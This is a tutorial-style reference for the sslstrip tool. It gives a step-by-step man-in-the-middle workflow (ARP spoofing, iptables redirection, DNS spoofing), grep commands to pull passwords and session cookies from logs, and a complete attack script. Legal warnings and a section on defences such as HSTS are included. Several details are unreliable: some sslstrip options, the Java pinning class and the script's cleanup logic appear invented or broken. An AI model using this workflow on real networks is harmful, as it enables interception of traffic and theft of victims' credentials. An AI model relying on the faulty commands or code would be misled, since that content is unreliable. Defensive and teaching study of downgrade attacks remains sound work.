sslstrip

Overview

sslstrip is a network utility for demonstrating and testing HTTPS downgrade attacks in controlled environments. It intercepts HTTPS connections and converts them to HTTP, allowing security researchers to analyze traffic and demonstrate SSL/TLS vulnerabilities.

Key Features

• Downgrade HTTPS to HTTP connections
• Transparent proxy for traffic interception
• Session hijacking demonstration
• Cookie capture and manipulation
• Logging of intercepted traffic
• Man-in-the-Middle (MITM) attack simulation
• Educational security testing

Critical Warning

LEGAL NOTICE: sslstrip should ONLY be used:

• In authorized penetration testing engagements
• On systems you own or have explicit permission to test
• In isolated lab environments
• For security research and education
• With proper documentation and authorization

Unauthorized use is illegal and unethical.

Use Cases (Authorized)

• Demonstrate SSL/TLS bypass vulnerabilities
• Security awareness training
• Penetration testing with authorization
• Network security research
• Vulnerability assessment
• Security conference demonstrations

Installation

Linux/Debian-based

sudo apt-get update
sudo apt-get install sslstrip

From Source

git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
sudo python setup.py install

Python Requirements

sudo apt-get install python2.7 python-twisted python-openssl
# or Python 3 version:
pip install sslstrip2

Verify Installation

sslstrip --help

Basic Concepts

How sslstrip Works

1. ARP Spoofing — Intercept traffic between victim and gateway
2. HTTP Interception — Catch HTTP requests for HTTPS sites
3. HTTPS Downgrade — Redirect HTTPS requests to HTTP
4. Traffic Logging — Capture and log credentials
5. Response Modification — Replace HTTPS links with HTTP

Network Requirements

For sslstrip to function, you need:

• Network access (same LAN or network segment)
• Ability to perform ARP spoofing
• Permission to modify traffic
• Target must accept HTTP downgrade

Lab Environment Setup

Prerequisites

# Kali Linux with necessary tools
sudo apt-get install sslstrip arpspoof dsniff tcpdump

# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1

# Make permanent
echo "net.ipv4.ip_forward=1" | sudo tee -a /etc/sysctl.conf

Lab Network Configuration

┌─────────────┐
│   Attacker  │  (192.168.1.10)
│ (Kali Linux)│
└──────┬──────┘
       │ ARP Spoof
       │
┌──────┴──────┐
│    Router   │  (192.168.1.1)
│  (Gateway)  │
└──────┬──────┘
       │
┌──────┴──────┐
│   Victim    │  (192.168.1.100)
│   Machine   │
└─────────────┘

Enable Iptables Rules

# Redirect HTTP traffic to sslstrip port
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
    -j REDIRECT --to-port 8080

# Redirect DNS if needed
sudo iptables -t nat -A PREROUTING -p udp --dport 53 \
    -j REDIRECT --to-port 5353

Basic Attack Workflow

Step 1: Identify Target Network

# Scan network for active hosts
sudo nmap -sn 192.168.1.0/24

# Identify target IP (example: 192.168.1.100)
# Identify gateway (example: 192.168.1.1)

Step 2: Enable IP Forwarding

sudo sysctl -w net.ipv4.ip_forward=1

Essential for traffic to pass through attacker’s machine.

Step 3: Configure Iptables

# Clear existing rules
sudo iptables -t nat -F

# Redirect HTTP to sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
    -j REDIRECT --to-port 8080

Step 4: Start sslstrip

# Basic usage with logging
sudo sslstrip -a -l 8080 -w capture.log

# Flags:
# -a : Handle all traffic (not just GET)
# -l : Listen on port (8080)
# -w : Write log file (capture.log)

Step 5: ARP Spoof Target

# In another terminal, ARP spoof victim
# Make victim think attacker is the gateway
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# Spoof bidirectionally (recommended)
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 &
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 &

Step 6: Monitor Traffic

# Watch captured traffic
tail -f capture.log

# Or view in real-time as it occurs
watch -n 1 "tail -20 capture.log"

Advanced Configuration

Custom Port Configuration

# Listen on different port
sudo sslstrip -a -l 9090 -w sslstrip.log

# Update iptables to match
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
    -j REDIRECT --to-port 9090

Verbose Logging

# Enable verbose output
sslstrip -a -l 8080 -w capture.log -v

# Output shows:
# [2024-01-15 14:32:15] Received request: GET http://example.com/
# [2024-01-15 14:32:16] Modified response: https -> http

SSL Certificate Replacement

# sslstrip can generate fake certificates
# Point sslstrip at CA certificate
sslstrip -c /path/to/ca.crt -k /path/to/ca.key

Combining with dnsspoof

# Spoof DNS to redirect to attacker
sudo dnsspoof -i eth0 -f hosts.txt &

# Where hosts.txt contains:
# 192.168.1.10  example.com
# 192.168.1.10  www.example.com

# Then run sslstrip
sudo sslstrip -a -l 8080 -w capture.log

Traffic Analysis and Credential Capture

Monitor Captured Log File

# View captured HTTPS downgrade events
cat capture.log

# Example output:
# HTTPS url requested: https://www.facebook.com/login
# Stripped to: http://www.facebook.com/login

Extract Credentials

# Parse log for login attempts
grep -i "post\|username\|password" capture.log

# Extract form data
grep "form data" capture.log | head -20

Analyze Cookie Traffic

# Find captured cookies
grep -i "cookie" capture.log

# Identify sensitive cookies
grep -i "session\|auth\|token" capture.log

Generate Statistics

#!/bin/bash
# Count captured HTTPS downgrades
echo "HTTPS Downgrades:"
grep -c "HTTPS url requested" capture.log

echo "POST Requests (Credentials):"
grep -c "POST" capture.log

echo "Unique Hosts Targeted:"
grep "HTTPS url requested" capture.log | \
    awk '{print $NF}' | \
    cut -d'/' -f3 | sort | uniq -c

Integration with Other Tools

Combined with tcpdump

# Capture raw traffic while running sslstrip
sudo tcpdump -i eth0 -w traffic.pcap

# Analyze with Wireshark later
wireshark traffic.pcap

Use with Ettercap

# Ettercap provides more advanced MITM features
sudo ettercap -T -q -i eth0 -F sslstrip.filter /192.168.1.100// /192.168.1.1//

Combined with mitmproxy

# Modern alternative with more features
sudo mitmproxy -p 8080 --mode transparent --ignore-hosts ".*"

# Provides interactive HTTP inspection

Integration Script

#!/bin/bash
# Comprehensive MITM attack script

TARGET="192.168.1.100"
GATEWAY="192.168.1.1"
INTERFACE="eth0"

echo "[*] Starting MITM attack on $TARGET"

# Enable forwarding
sudo sysctl -w net.ipv4.ip_forward=1

# Setup iptables
sudo iptables -t nat -F
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
    -j REDIRECT --to-port 8080

# Start sslstrip
echo "[*] Starting sslstrip..."
sudo sslstrip -a -l 8080 -w mitm_capture.log &
SSLSTRIP_PID=$!

# Start ARP spoof
echo "[*] Starting ARP spoof..."
sudo arpspoof -i $INTERFACE -t $TARGET $GATEWAY &
SPOOF_PID=$!

# Monitor traffic
echo "[*] Monitoring traffic (Ctrl+C to stop)..."
tail -f mitm_capture.log

# Cleanup
trap "kill $SSLSTRIP_PID $SPOOF_PID; echo '[*] Cleaned up'" EXIT

Defensive Measures and Mitigation

How to Protect Against sslstrip

Defense	Method
HSTS	Enable HTTP Strict-Transport-Security headers
Certificate Pinning	Pin SSL/TLS certificates in applications
VPN	Use VPN to encrypt all traffic
Network Security	Implement ARP spoofing detection
DNS Security	Use DNSSEC to prevent DNS spoofing

HSTS Headers

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

Instructs browsers to always use HTTPS, blocking sslstrip downgrade.

Certificate Pinning Example

// Android/Java example
HttpPinning pinning = new HttpPinning("example.com")
    .add("example.com", "sha256/AAAAAAAAAA...")
    .add("*.example.com", "sha256/BBBBBBBBB...");

Ensures application only accepts specific certificates.

Network Detection

# Monitor for ARP spoofing
sudo arpwatch -i eth0 -f arpwatch.db

# Alert on suspicious ARP activity
sudo snort -i eth0 -c /etc/snort/snort.conf

Security Testing Best Practices

Authorization Requirements

Before any testing:

1. Written Authorization
   - Must have explicit written permission
   - Document scope and duration
   - Obtain client signature

2. Lab Environment
   - Use isolated test network
   - Don't test production systems
   - Document all findings

3. Data Protection
   - Secure captured credentials
   - Encrypt logs
   - Destroy data after testing

Authorized Lab Testing Example

#!/bin/bash
# Authorized security testing in lab environment

# 1. Verify lab isolation
echo "Verifying lab network isolation..."
ip route | grep -q "192.168.100" || {
    echo "ERROR: Not on test network!"
    exit 1
}

# 2. Document test
TEST_ID="SEC-2024-001"
LOG_DIR="./tests/$TEST_ID"
mkdir -p "$LOG_DIR"

# 3. Run authorized test
echo "[*] Running authorized sslstrip test: $TEST_ID"
sudo sslstrip -a -l 8080 -w "$LOG_DIR/capture.log"

# 4. Secure results
echo "[*] Securing test results..."
gpg -e -r admin@company.com "$LOG_DIR/capture.log"
shred -vfz "$LOG_DIR/capture.log"

# 5. Document findings
echo "[*] Test complete. Results in $LOG_DIR/"

Troubleshooting

sslstrip Not Intercepting Traffic

Issue: ARP spoof active but sslstrip not capturing.

Solution:

# Verify iptables rules
sudo iptables -t nat -L -n

# Confirm traffic redirection
sudo tcpdump -i lo -n "tcp port 8080"

# Check sslstrip is listening
sudo lsof -i :8080

ARP Spoof Not Working

Issue: arpspoof command shows no output or target unaffected.

Solution:

# Verify arpspoof is installed
which arpspoof

# Check permissions
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# Monitor ARP traffic
sudo tcpdump -i eth0 'arp'

Credentials Not Captured

Issue: sslstrip running but no credentials in log.

Solution:

# Verify target actually accessing HTTPS sites
sudo tcpdump -i eth0 'tcp port 443'

# Check if target uses HSTS (preload list)
curl -I https://target.com | grep Strict-Transport

# Monitor captured log
tail -f capture.log

# Check HTTP traffic is being redirected
sudo tcpdump -i eth0 'tcp port 80'

Legal and Ethical Considerations

Authorized Use Only

WARNING: Unauthorized use is:

• A federal crime under CFAA (Computer Fraud and Abuse Act)
• Violation of GDPR and data protection laws
• Civil liability for damages
• Criminal prosecution possibility

Proper Authorization

Before any testing:

✓ Written authorization from system owner
✓ Defined scope and duration
✓ Approved penetration test contract
✓ Legal review completed
✓ Client signature obtained

Documentation

Important to maintain:
- Test plan and authorization letter
- Start/end times of test
- Systems tested and credentials used
- Findings and vulnerabilities discovered
- Evidence of proper remediation
- Secure disposal of test data

References

• GitHub: moxie0/sslstrip
• Original Research: Moxie Marlinspike Blog
• Ethical Hacking: EC-Council
• HSTS Standard: RFC 6797

Quick Reference

# Enable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=1

# Setup iptables redirection
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
    -j REDIRECT --to-port 8080

# Start sslstrip with logging
sudo sslstrip -a -l 8080 -w capture.log

# ARP spoof target (in another terminal)
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# View captured traffic
tail -f capture.log

# Extract credentials from log
grep -i "post\|password" capture.log

# Cleanup
sudo pkill arpspoof
sudo pkill sslstrip